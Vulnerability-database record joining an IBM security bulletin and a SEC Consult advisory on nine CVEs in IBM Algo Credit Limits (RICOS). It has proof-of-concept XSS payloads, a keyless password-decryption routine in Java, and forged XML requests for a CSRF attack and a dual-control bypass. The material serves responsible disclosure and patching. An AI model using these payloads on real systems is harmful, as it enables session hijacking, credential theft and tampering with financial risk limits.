RICOS in IBM Algo Credit Limits (aka ACLM) 4.5.0 through 4.7.0 before 4.7.0.03 FP5 in IBM Algorithmics sends cleartext credentials over HTTP, which allows remote attackers to obtain sensitive information by sniffing the network.
{"ibm": [{"lastseen": "2022-06-28T22:05:24", "description": "## Summary\n\nAbstract: Multiple security vulnerabilities exist in certain GUI components of IBM Algo Credit Limits, namely ACLM Web GUI, PDS Blotter Web GUI, and ACLM Win GUI. Details of each vulnerability and the affected component(s) are set out below.\n\n## Vulnerability Details\n\n**DESCRIPTION:** \nCustomers who have IBM Algo Credit Limits are potentially impacted by these vulnerabilities. \n \n\n\n**CVE ID**| **DESCRIPTION** \n---|--- \n[_CVE-2014-0864_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0864>) \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/90938_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90938>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)| Affected Component(s): ACLM Web GUI \nThe ACLM Web GUI does not verify that requests are made only from within the web application. An attacker could trick users into making an unintentional request to the web application which will be treated as an authorized request. This may allow an attacker to perform tasks on behalf of the victim user, like modifying limits. \nThe attack requires network access, no authentication and some degree of specialized knowledge and techniques. An attack will not compromise the confidentiality of information or the availability of the system but may compromise the integrity of data. \n[_CVE-2014-0865_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0865>) \nCVSS: \nCVSS Base Score: 3.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/90939_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90939>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:S/C:N/I:P/A:N)| Affected Components: ACLM Win GUI \nThe ACLM Win GUI client performs input validation only client-side. 
This could allow an attacker to alter arbitrary data, e.g. create a limit. This vulnerability could also be used to circumvent dual control mechanisms by manipulating data after creation. \nThe attack requires network access, some degree of authentication and degree of specialized knowledge and techniques. An attack will not compromise the confidentiality of information or the availability of the system but may compromise the integrity of data. \n[_CVE-2014-0866_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0866>) \nCVSS: \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/90940_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90940>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)| Affected Component(s): ACLM Win GUI, PDS Blotter Web GUI \nThe ACLM Win GUI client submits user credentials in plain-text. An attacker with access to the network communication could perform man-in-the-middle attacks and obtain user credentials. This vulnerability also applies to the PDS Blotter Web GUI client, where authentication is performed unencrypted. \nThe attack requires network access, no authentication and some degree of specialized knowledge and techniques. An attack may partially compromise the confidentiality of information. It will not compromise the availability of the system or the integrity of data. \n[_CVE-2014-0867_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0867>) \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/90941_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90941>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)| Affected Component(s): ACLM Web GUI \nA vulnerable page in ACLM Web GUI could allow an attacker to set and overwrite arbitrary cookies for a user that clicks on a manipulated link. 
\nThe attack requires network access, no authentication and some degree of specialized knowledge and techniques. An attack will not compromise the confidentiality of information or the availability of the system but may compromise the integrity of data. \n[_CVE-2014-0868_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0868>) \nCVSS Base Score: 3.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/90942_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90942>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:S/C:N/I:P/A:N)| Affected Component(s): ACLM Web GUI \nThe ACLM Web GUI application performs input validation only client-side. This could allow an attacker to alter arbitrary data. This vulnerability could also be used to circumvent dual control mechanisms by manipulating data after creation. \nThe attack requires network access, some degree of authentication and degree of specialized knowledge and techniques. An attack will not compromise the confidentiality of information or the availability of the system but may compromise the integrity of data. \n[_CVE-2014-0869_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0869>) \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/90943_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90943>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)| Affected Component(s): ACLM Web GUI, PDS Blotter Web GUI, ACLM Win GUI \nInsufficient encryption for storing and transferring users\u2019 passwords could allow an attacker to retrieve the plain-text passwords without further knowledge of cryptographic keys. \nThe attack requires network access, no authentication and some degree of specialized knowledge and techniques. 
An attack may partially compromise the confidentiality of information but will not compromise the availability of the system or the integrity of data. \n[_CVE-2014-0870_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0870>) \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/90944_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90944>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)| Affected Component(s): ACLM Web GUI, PDS Blotter Web GUI \nThe ACLM Web GUI and the PDS Blotter Web GUI do not correctly neutralize user-controllable input before it is placed in output that is served as a web page. This may be used in a Cross-site scripting attack. Attackers could compromise user sessions and impersonate other users while performing arbitrary actions on behalf of the victim user. \nThe attack requires network access, no authentication and some degree of specialized knowledge and techniques. An attack will not compromise the confidentiality of information or the availability of the system but may compromise the integrity of data. \n[_CVE-2014-0871_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0871>) \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/90945_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90945>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)| Affected Component(s): ACLM Web GUI \nTomcat configuration discloses technical details within error messages to the user. This could allow an attacker to collect valuable data about the environment of the solution. \nThe attack requires network access, no authentication and some degree of specialized knowledge and techniques. 
An attack may partially compromise the confidentiality of information but will not compromise the availability of the system or the integrity of data. \n[_CVE-2014-0894_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0894>) \nCVSS Base Score: 3.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/91313_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/91313>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:S/C:P/I:N/A:N)| Affected Component(s): ACLM Web GUI \nThe password and the username of the backend database are disclosed in clear-text to the user of the ACLM Web GUI client. This could allow attackers to directly connect to the backend database and manipulate arbitrary data stored in the database. \nThe attack requires network access, some degree of authentication and specialized knowledge and techniques. An attack may partially compromise the confidentiality of information but will not compromise the availability of the system or the integrity of data. \n \n## Affected Products and Versions\n\nIBM Algo Credit Limits versions 4.5.0 - 4.7.0\n\n## Remediation/Fixes\n\nA fix has been created for version 4.7.0.03 of the named product. Download and install the fix as soon as practicable. Fix and installation instructions are provided at the URL listed below. \n \nFor versions prior to 4.7.0 IBM recommends upgrading to a fixed, supported version/release/platform of the product. 
\n \n \n\n\nPatch Number| Download URL \n---|--- \nACLM 4.7.0.03 FP5| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-SolOra-fp0005:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-SolOra-fp0005:0&includeSupersedes=0&source=fc&login=true>) \n[http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-SolDB2-fp0005:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-SolDB2-fp0005:0&includeSupersedes=0&source=fc&login=true>) \n[http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-RHES-fp0005:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-RHES-fp0005:0&includeSupersedes=0&source=fc&login=true>) 
\n[http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-AIX-fp0005:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-AIX-fp0005:0&includeSupersedes=0&source=fc&login=true>) \n[http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-WinDB2-fp0005:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-WinDB2-fp0005:0&includeSupersedes=0&source=fc&login=true>) \n[http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-WinDB2-fp0005:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-WinDB2-fp0005:0&includeSupersedes=0&source=fc&login=true>) \n \n## Workarounds and Mitigations\n\nNone known, apply fixes.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 
Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\nA. Kolmann, V. Habsburg-Lothringen, F. Lukavsky of SEC Consult Vulnerability Lab\n\n## Change History\n\n23 June 2014: Original Copy Published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. 
\"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SS9T6M\",\"label\":\"Algo Credit Limits\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"4.7.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}] \n\n## Product Synonym\n\nACL;ACLM;RICOS;Algo Credit Limit Manager", "cvss3": {}, "published": "2018-06-15T22:31:27", "type": "ibm", "title": "Security Bulletin: Multiple Security Vulnerabilities in Certain GUI Components of IBM Algo Credit Limits.", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0864", "CVE-2014-0865", "CVE-2014-0866", "CVE-2014-0867", "CVE-2014-0868", "CVE-2014-0869", "CVE-2014-0870", "CVE-2014-0871", "CVE-2014-0894"], "modified": 
"2018-06-15T22:31:27", "id": "EAD07763DB215245A2D68732E923A4EEDD76DA386AE47C4E3383928DCFB4324C", "href": "https://www.ibm.com/support/pages/node/513307", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSEC Consult Vulnerability Lab Security Advisory < 20140630-0 >\r\n=======================================================================\r\n title: Multiple severe vulnerabilities\r\n product: IBM Algorithmics RICOS\r\n vulnerable version: 4.5.0 - 4.7.0\r\n fixed version: 4.7.0.03\r\n CVE number: CVE-2014-0894\r\n CVE-2014-0871\r\n CVE-2014-0870\r\n CVE-2014-0869\r\n CVE-2014-0868\r\n CVE-2014-0867\r\n CVE-2014-0866\r\n CVE-2014-0865\r\n CVE-2014-0864\r\n impact: critical\r\n homepage: http://www-01.ibm.com/software/analytics/algorithmics/\r\n found: 2013-12-19\r\n by: A. Kolmann, V. Habsburg-Lothringen, F. Lukavsky\r\n SEC Consult Vulnerability Lab\r\n https://www.sec-consult.com\r\n=======================================================================\r\n\r\nVendor description:\r\n- -------------------\r\nIBM Algorithmics software enables financial institutions and corporate\r\ntreasuries to make risk-aware business decisions. Supported by a global\r\nteam of risk experts based in all major financial centers, IBM\r\nAlgorithmics solution offerings include market, credit and liquidity risk,\r\nas well as collateral and capital management.\r\n\r\nSource: http://www-01.ibm.com/software/analytics/algorithmics/\r\n\r\nRICOS is a pre-deal limit management solution part of the Algo Suite.\r\n\r\n\r\nBusiness recommendation:\r\n- ------------------------\r\nThe identified vulnerabilities affect integrity and confidentiality of the\r\nrisk management system. SEC Consult does not recommend to rely on RICOS as\r\npart of risk management until a thorough security review has been performed\r\nby security professionals. 
As a workaround, access should be limited only to\r\ntrusted users internally and sample checks regarding the plausibility of limits\r\nshould be performed manually.\r\n\r\n\r\nVulnerability overview/description:\r\n- -----------------------------------\r\n1) Information Disclosure (PSIRT#1440 / CVE-2014-0871 / CVSS 4.3)\r\nThe Tomcat configuration discloses technical details within error messages to\r\nthe user, which allows an attacker to collect valuable data about the\r\nenvironment of the solution.\r\n\r\n2) Password Disclosure (PSIRT#1441 / CVE-2014-0894 / CVSS 3.5)\r\nThe password and the username of the backend database are disclosed in\r\nclear-text to the user of the web application. This allows attackers to\r\ndirectly connect to the backend database and manipulate arbitrary data stored\r\nin the database (e.g. limits).\r\n\r\n3) Non-permanent Cross-Site Scripting (PSIRT#1442 / CVE-2014-0870 / CVSS 4.3)\r\nSeveral parameters in the RICOS web front end and the Blotter are not properly\r\nsanitized and cause Cross-Site Scripting vulnerabilities. Attackers can steal\r\nuser sessions and impersonate other users while performing arbitrary actions\r\non behalf of the victim user.\r\n\r\n4) Broken Encryption (PSIRT#1443 / CVE-2014-0869 / CVSS 4.3)\r\nWeak cryptographic algorithms, being used to store and transfer\r\nuser's passwords, allow an attacker to retrieve the plain-text passwords\r\nwithout further knowledge of cryptographic keys.\r\n\r\n5) Manipulation of read-only data / dual control mechanism bypass (PSIRT#1444 / CVE-2014-0868 /\r\nCVSS 3.5)\r\nSeveral fields of stored data within RICOS are marked as read-only in the web\r\napplication, disallowing modification of certain fields. These checks are only\r\nperformed client-side, allowing an attacker to alter arbitrary data. 
An\r\nattacker can create a limit, alter the username of the created limit and\r\nconfirm the limit himself, circumventing dual control mechanisms advertised by\r\nRICOS.\r\n\r\n6) Cross-Site Cookie Setting (PSIRT#1445 / CVE-2014-0867 / CVSS 4.3)\r\nA vulnerable page in RICOS allows an attacker to set and overwrite arbitrary\r\ncookies for a user that clicks on a manipulated link.\r\n\r\n7) Plain-text submission of passwords (PSIRT#1446 / CVE-2014-0866 / CVSS 4.3)\r\nThe RICOS fat client submits user credentials in plain-text. An attacker with\r\naccess to the network communication can perform man-in-the-middle attacks and\r\nsteal user credentials.\r\nThis vulnerability also applies to the Blotter, where authentication is\r\nperformed unencrypted.\r\n\r\n8) Client-side Input Validation (PSIRT#1447 / CVE-2014-0865 / CVSS 3.5)\r\nThe RICOS fat client performs input validation only client-side. This allows\r\nan attacker to alter arbitrary data. An attacker can create a limit, alter\r\nthe username of the created limit and confirm the limit himself, circumventing\r\ndual control mechanisms advertised by RICOS.\r\n\r\n9) Cross-Site Request Forgery (PSIRT#1448 / CVE-2014-0864 / CVSS 4.3)\r\nThe web application does not verify that requests are made only from within\r\nthe web application, allowing an attacker to trick users into performing\r\nrequests to the web application. This allows an attacker to perform tasks on\r\nbehalf of the victim user like modifying limits.\r\n\r\n\r\nProof of concept:\r\n- -----------------\r\n1) Information Disclosure\r\nThe following URL causes a status 404, disclosing the Tomcat version:\r\nhttps://ricos/ricos470/classes/\r\n\r\nIf control characters (i.e. 
\x00) are sent as part of the cookie, a stack trace\r\nis triggered\r\n\r\n2) Password Disclosure\r\nThe following request sent by the client during regular communication shows the\r\ndatabase connection settings including the username and the password in\r\nclear-text.\r\n\r\nPOST /ricos470/Executer HTTP/1.1\r\nHost: ricos\r\n\r\n...SNIP...\r\n<i n="URN" v=""/><i n="SecServiceURN" v="obsv2:ricos:20100"/><i n="SecSource" v="LM web"/><i\r\nn="SecTimeout" v="7200"/><i n="AcsAutoReconnect" v="Y"/><i n="AcsFunctionLimits" v=""/></t><t\r\nn="ObServer"><i n="UserId" v=""/><i n="Password" v=""/><i n="Host" v="ricos"/><i n="Port"\r\nv="20100"/><i n="CollectionId" v=""/><i n="DbName" v="RICA"/><i n="Location" v="RICA"/><i\r\nn="DbType" v="ORA"/><i n="Application" v="RICOS"/><i n="AppId" v="LM web"/><i n="AppDesc" v=""/><i\r\nn="AppVer" v="4.7.0"/><i n="Component" v="RICOS Gui"/><i n="DbUser" v="rica"/><i n="DbPass"\r\nv="password"/>\r\n...SNIP...\r\n\r\n3) Non-permanent Cross-Site Scripting\r\nThe following URLs demonstrate Cross-Site Scripting vulnerabilities:\r\n\r\nPOST /ricos470/rcore6/main/showerror.jsp HTTP/1.1\r\nHost: ricos\r\n\r\nMessage=<script>alert(document.cookie)</script>%0D%0A&Stack=java.lang....\r\n\r\nhttps://ricos/ricos470/rcore6/main/buttonset.jsp?ButtonsetClass=x";+alert(document.cookie);//x\r\n\r\nhttps://ricos/ricos470/rcore6/frameset.jsp?PROF_NAME=&Caller=login&ChildBrowser=Y&MiniBrowse=Y&OBJECT=profile_login&CAPTION_SELECT=MNU_PROFILE_VIEW&MBName=profile_login')");alert(document.cookie);//\r\n\r\nhttp://ricos/algopds/rcore6/main/browse.jsp?Init=N";alert(document.cookie)&Name=trades&StoreName=trades&HandlerFrame=Caption&ShowStatus=N&HasMargin=Y\r\n\r\n\r\nhttp://ricos/algopds/rcore6/main/ibrowseheader.jsp?Name=trades;alert(document.cookie)&StoreName=trades;alert(document.cookie)&STYLESHEET=browse"/><script>alert(document.cookie)</script>\r\n\r\n4) Broken Encryption\r\nThe user's password is transported frequently in requests within the 
application.\r\nThe following function decrypts the password without requiring any cryptographic key:\r\n\r\npublic static void decrypt(String string)\r\n{\r\n\tint nRadix = 32;\r\n\tint nR2 = nRadix * nRadix / 2;\r\n\tGregorianCalendar cal = new GregorianCalendar();\r\n\tString key = string.substring(0, 2);\r\n\tint nKey = Integer.parseInt(key, 32);\r\n\t\r\n\tString encPw = string.substring(2, string.length());\r\n\tint y = 0;\r\n\tfor (int i = 0; i < encPw.length(); i+=2)\r\n\t{\r\n\t\tString aktuell = encPw.substring(i,i+2);\t\r\n\t\tint new_value = Integer.parseInt(aktuell, 32);\r\n\t\tint character = - nKey * (y + 1) % nR2 + new_value;\r\n\t\tchar decrypt = (char) character;\r\n\t\tSystem.out.print(decrypt);\r\n\t\ty = y + 1;\r\n\t}\t\t\r\n}\r\n\r\n5) Manipulation of read-only data / dual control mechanism bypass\r\nThe following example illustrates how to manipulate a request so that the server\r\nsaves it on behalf of another user (only the relevant parts are shown):\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<ds>\r\n <t n="Service">\r\n <i n="RequestType" v="#Action"/>\r\n <t n="#ActionData">\r\n <i n="#ActionName" v="web.getmeta_udf"/>\r\n <i n="#Mode" v="#Sync"/>\r\n <i n="#Request" v="#Execute"/>\r\n <t n="#OutputData">\r\n <t n="#MapTable">\r\n <i n="#ResultData" v="#ResultData"/>\r\n <i n="#ResultTable" v="#ResultTable"/>\r\n </t>\r\n </t>\r\n <t n="#InputData">\r\n <t n="#WorkTable">\r\n <t n="det_limit">\r\n <i n="SCTYGEID" v="A"/>\r\n[...]\r\n <i n="LMLCURID" v="other_user"/>\r\n <i n="LMEQEPSTDA" v=""/>\r\n[...]\r\n <i n="MFURID" v="other_user"/>\r\n <i n="LMEVFL" v="N"/>\r\n <i n="SOLMFL" v="N"/>\r\n[...]\r\n <i n="CRURID" v="other_user"/>\r\n <i n="MFTS" v=""/>\r\n <i n="MFURID" v="other_user"/>\r\n[...]\r\n <i n="CRURID" v="other_user"/>\r\n <i n="MFTS" v=""/>\r\n[...]\r\n </t>\r\n <t n="Session">\r\n <t n="SessionData">\r\n <i n="LoginUser" v="other_user"/>\r\n <i n="LoginPass" v="8HC34BCM5JE84ND95RED"/>\r\n[...]\r\n <i n="LoginUser 
v="other_user"/>\r\n <i n="LoginPWD" v="326K9DC9FNIT3T70A3D6"/>\r\n <i n="URN" v=""/>\r\n <i n="SecServiceURN" v="obsv2:ricos:20100"/>\r\n[...]\r\n </t>\r\n <t n="ObServer">\r\n <i n="UserId" v="other_user"/>\r\n <i n="Password" v=""/>\r\n <i n="Host" v="ricos"/>\r\n[...]\r\n <i n="Prefix" v="RICA"/>\r\n <i n="DbSystem" v="oracle"/>\r\n <i n="LoginUserId" v="other_user"/>\r\n </t>\r\n </t>\r\n </t>\r\n</ds>\r\n\r\n6) Cross-Site Cookie Setting\r\nThe following URL allows setting of arbitrary cookies:\r\n\r\nhttps://ricos/ricos470/rcore6/main/addcookie.jsp?test-cookie=cookie-content\r\n\r\n7) Plain-text submission of passwords\r\nNeither the fat client nor the Blotter use https to communicate with the\r\nbackend server. Both send unencrypted credentials via http during authentication.\r\n\r\n8) Client-side Input Validation\r\nBy manipulating serialized objects that are transmitted by the fat client,\r\nit is possible to change the user name who created a limit, allowing an attacker\r\nto bypass dual control mechanisms.\r\n\r\n9) Cross-Site Request Forgery\r\nThe following request, sent on behalf of an authenticated user will e.g.\r\nchange the currency of a given deal:\r\n\r\nPOST http://ricos/ricos470/Executer HTTP/1.1\r\nHost: ricos\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<ds>\r\n <t n="Service">\r\n <i n="RequestType" v="#Action"/>\r\n <t n="#ActionData">\r\n <i n="#ActionName" v="web.updrec_msp"/>\r\n <i n="#Mode" v="#Sync"/>\r\n <i n="#Request" v="#Execute"/>\r\n <t n="#InputData">\r\n <t n="#MapTable">\r\n <i n="#InputData" v="det_msp"/>\r\n </t>\r\n <t n="#WorkTable">\r\n <t n="det_msp">\r\n <i n="SYPMID" v="SYS-PAR-ID"/>\r\n <i n="CUCD" v="USD"/>\r\n <i n="MIGORILV" v="11"/>\r\n <i n="ILPLMVFL" v="Y"/>\r\n <i n="ILNEMVFL" v="Y"/>\r\n <i n="BSCUONFL" v="N"/>\r\n <i n="PBSCUOFL" v="N"/>\r\n <i n="LORICUTEFL" v="N"/>\r\n <i n="SYSAVAILFL" v="F"/>\t\r\n <i n="CUSTID" v="CUSTOMER"/>\r\n <i n="CBNALI" v="IS-LOCATED-IN"/>\r\n <i n="CBNAAG" 
v="AUTOMATIC-GROUP"/>\r\n <i n="UDF1" v="Welcome to ricos 4.71"/>\r\n </t>\r\n...SNIP...\r\n\r\n\r\nVulnerable / tested versions:\r\n- -----------------------------\r\nIBM Algorithmics RICOS 4.71\r\n\r\n\r\nVendor contact timeline:\r\n- ------------------------\r\n2014-01-24: Contacting vendor through psirt@vnet.ibm.com\r\n2014-01-24: Vendor response, will likely require more than 30 days to resolve issues\r\n asking for acknowledgements\r\n2014-01-24: Sending acknowledgements\r\n2014-01-29: Vendor assigns PSIRT advisory numbers 1440-1448 to reported issues\r\n2014-02-07: Vendor confirms 8 of 9 vulnerabilities and sends CVE and CVSS\r\n2014-02-10: Providing further information on assumed to be false positive issue 1441\r\n2014-02-14: Telco to clarify vulnerability details and agree on further procedure\r\n patches are scheduled for end of June 2014\r\n2014-02-20: Vendor confirms issue 1441 to be a vulnerability\r\n2014-05-27: Vendor announces that patches will be released on 2014-06-30\r\n2014-06-26: Vendor published patches and security bulletin\r\n https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881\r\n2014-06-30: SEC Consult publishes the advisory\r\n\r\n\r\nSolution:\r\n- ---------\r\nApply patch ACLM 4.7.0.03 FP5. 
More information:\r\nhttps://www-304.ibm.com/support/entdocview.wss?uid=swg21675881\r\n\r\n\r\nWorkaround:\r\n- -----------\r\nLimit access to RICOS and manually perform sample checks regarding the\r\nplausibility of limits.\r\n\r\n\r\nAdvisory URL:\r\n- -------------\r\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\r\n\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nSEC Consult Vulnerability Lab\r\n\r\nSEC Consult\r\nVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius\r\n\r\nHeadquarter:\r\nMooslackengasse 17, 1190 Vienna, Austria\r\nPhone: +43 1 8903043 0\r\nFax: +43 1 8903043 15\r\n\r\nMail: research at sec-consult dot com\r\nWeb: https://www.sec-consult.com\r\nBlog: http://blog.sec-consult.com\r\nTwitter: https://twitter.com/sec_consult\r\n\r\nInterested to work with the experts of SEC Consult?\r\nWrite to career@sec-consult.com\r\n\r\nEOF F. Lukavsky / @2014\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\nComment: Using GnuPG with Thunderbird - http://www.enigmail.net/\r\n\r\niQEcBAEBAgAGBQJTsZDnAAoJECyFJyAEdlkKDUIH/3d/PLRdTNA9EludLlr7M+K+\r\nuaBxgyajy8sT7dYMedR3EcxKxZSUGExnv+2X4GZN0Px8a9NvEewURIAiM+ZAsdYg\r\nuFKPtYcuhO6TyKV/QoPUsixEM3IgzyMpGqcf2qtWqNOb4jVpXvtyO2gLoHQNj04F\r\nuQl0v+1it2HNVxd6vEj2zj7neuOLb3WhE6ObDAlVkzcOutvTF84cVyNYpBBuCD6e\r\n0TsopvfkJ3l6iJPSvgXpl1gTmSoR0PfEC14JYVKCK0pTbhXc81J8YYGQnEklWazl\r\nEEUoMVM0I6Yzg9oXGpHf5cBX49pbzAYm5lhJkCDiSQ+2ueSYN0BEz3e2JMtDEZ8=\r\n=OFL7\r\n-----END 